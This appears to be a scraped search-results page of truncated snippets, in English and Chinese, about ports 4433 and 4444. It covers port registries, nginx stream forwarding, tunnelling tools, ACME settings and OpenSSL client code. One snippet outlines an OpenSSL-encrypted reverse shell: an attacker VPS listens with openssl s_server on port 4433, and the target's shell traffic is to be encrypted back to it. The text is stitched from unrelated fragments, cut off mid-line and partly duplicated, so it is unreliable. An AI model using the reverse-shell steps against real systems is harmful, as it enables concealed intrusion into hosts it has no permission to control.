4433–4436 TCP Axence nVision [68] Unofficial 4444 TCP UDP Oracle WebCenter Content: Content Server—Intradoc Socket port. (formerly known as Oracle Universal Content Management). Port though often changed during installation Metasploit: Default listener port Unofficial 4444–4445 TCP I2P HTTP/S prox...
端口映射tcp 配置stream需要和http同级 worker_processes1;events{worker_connections1024;}#映射stream{#将4422端口转发到test1_https.com的4433端口upstream server_upstreams_port4433{server test1_https.com:4433;}server{listen4422;监听端口 proxy_pass server_upstreams_port4433;转发}}http{includemime.types;default...
{ "streammode":true, "key": "PASSWORD", "crypt": "", "mode": "", "mtu": 1400, "snd...
...openssl加密传输 第一步,在vps上生成SSL证书的公钥/私钥对 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem...VPS监听反弹shell openssl s_server -quiet -key key.pem -cert cert.pem -port 4433 第三步,在目标上用openssl加密反弹shell的流量...
// Disable TLS-ALPN challenges"alt_http_port":8080,// Alternate port for HTTP challenges"alt_tlsalpn_port":4433// Alternate port for TLS-ALPN challenges},"cert":"/home/ubuntu/my_cert.crt",// Cert file, mutually exclusive with the ACME options above"key":"/home/ubuntu/my_key.crt",/...
There are different types of port numbers: Well Known Ports (0 to 1023), Registered Ports (1024 to 49151) and Dynamic or Private Ports (49152 to 65535).
$ tunnel -udp -type 2 -src -dst ams.server.address.com:5555 the -udp flags tells it to enable udp tunneling and -type 2 is setting the server type to relay ( 2 for relay and 1 for gate ) here -dst is pointing to the ams server and the port is the gate port ...
最好不要改为0,改成1。端口分配是从上一次分配的端口号+1开始分配的,所以一般不会有什么问题。端口分配算法在tcp_ipv4.c中tcp_v4_get_port中。 监听地址问题 [root@localhost i386]# netstat -nlp Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/...
最好不要改为0,改成1。端口分配是从上一次分配的端口号+1开始分配的,所以一般不会有什么问题。端口分配算法在tcp_ipv4.c中tcp_v4_get_port中。 监听地址问题 [root@localhost i386]# netstat -nlp Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/...
(const char* server_ip, int server_port); SSL_CTX* create_ssl_context(); SSL* create_ssl(SSL_CTX* ctx, int sockfd); bool perform_ssl_handshake(SSL* ssl); int main() { const char* server_ip = ""; int server_port = 4433; // 替换为实际的服务器端口 init_openssl(); ...